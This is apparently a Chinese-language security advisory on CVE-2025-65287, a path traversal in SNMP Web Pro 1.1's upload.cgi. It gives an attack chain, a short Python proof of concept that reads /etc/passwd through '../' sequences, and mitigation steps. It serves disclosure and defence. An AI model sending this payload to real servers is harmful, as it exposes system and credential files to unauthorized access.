CVE-2025-65287 SNMP Web Pro 1.1 cgi-bin/upload.cgi 目录遍历漏洞

漏洞信息

漏洞编号

CVE-2025-65287

漏洞类型

目录遍历

CVSS评分

4.3 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SNMP Web Pro 1.1

漏洞概述

CVE-2025-65287是SNMP Web Pro 1.1版本中存在的一个未经认证的目录遍历漏洞。该漏洞位于Web服务器的cgi-bin/upload.cgi脚本中，攻击者可以利用此漏洞远程读取服务器上的任意文件。由于CGI程序在处理用户输入参数时，直接将用户提供的参数与基础路径进行拼接（使用memcpy和strcat函数），而没有对输入进行任何验证或规范化处理，因此攻击者可以通过构造包含../序列的路径参数来突破预期的目录限制，访问系统中的敏感文件。此外，该漏洞还存在于下载功能分支中，程序会将未经消毒的用户参数直接回显到HTTP响应头的Content-Disposition字段中，这可能导致HTTP头部注入风险。CVSS评分为4.3，属于中等严重程度，攻击复杂度低且无需认证和用户交互即可利用，但机密性影响仅为低级别。

技术细节

该漏洞的核心问题在于cgi-bin/upload.cgi对用户输入参数的处理方式存在严重缺陷。程序使用memcpy和strcat函数将用户提交的参数直接附加到基础路径/var/www/files/userScript/后面，构建完整的文件访问路径。这种实现方式完全缺乏输入验证机制，攻击者可以注入路径遍历序列（如../）来逃离受限目录。例如，通过构造类似../../../../etc/passwd的参数，攻击者能够访问系统任意文件。在下载功能分支中，程序直接将用户输入回显到Content-Disposition HTTP头部字段，未进行任何字符过滤或编码处理，这不仅可能导致路径遍历，还可能引发HTTP头部注入攻击。攻击者可以通过精心构造的请求头部实现响应分割等进一步攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标服务器上运行的SNMP Web Pro 1.1版本，并定位存在漏洞的cgi-bin/upload.cgi端点

STEP 2

步骤2

攻击者构造包含目录遍历序列（../）的恶意请求参数，绕过预期的文件访问目录限制

STEP 3

步骤3

发送HTTP GET请求到upload.cgi，参数中包含构造的路径遍历payload，如file=../../../../etc/passwd

STEP 4

步骤4

服务器端CGI程序使用memcpy和strcat将用户输入直接拼接到基础路径，未进行验证即访问目标文件

STEP 5

步骤5

攻击者成功获取服务器敏感文件内容，如系统账户文件、配置文件、源代码等

STEP 6

步骤6

利用获取的敏感信息进行进一步攻击，如获取数据库凭证、API密钥等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-65287 PoC - Directory Traversal in SNMP Web Pro 1.1
# Target: cgi-bin/upload.cgi
# Vulnerability: Unauthenticated directory traversal via unsanitized params

target_url = "http://target.com/cgi-bin/upload.cgi"

# Read arbitrary file via directory traversal
def read_file(filepath):
    """Exploit directory traversal to read arbitrary files"""
    params = {
        'action': 'download',
        'file': f'../../../../{filepath}'
    }
    response = requests.get(target_url, params=params)
    return response.text

# Example: Read /etc/passwd
if __name__ == "__main__":
    # Test with /etc/passwd
    result = read_file('etc/passwd')
    print(result)

影响范围

SNMP Web Pro 1.1

防御指南

临时缓解措施

在生产环境中，可通过配置Web服务器规则暂时阻止包含../序列的请求访问cgi-bin目录；同时限制upload.cgi的访问来源IP，仅允许内网或受信任的网络段访问；临时关闭文件上传和下载功能，待官方补丁发布后再恢复使用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65287
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65287
3 Details https://www.cvedetails.com/cve/CVE-2025-65287/
4 VulDB https://vuldb.com/cve/CVE-2025-65287
5 Link https://damiri.fr/en/cve/CVE-2025-65287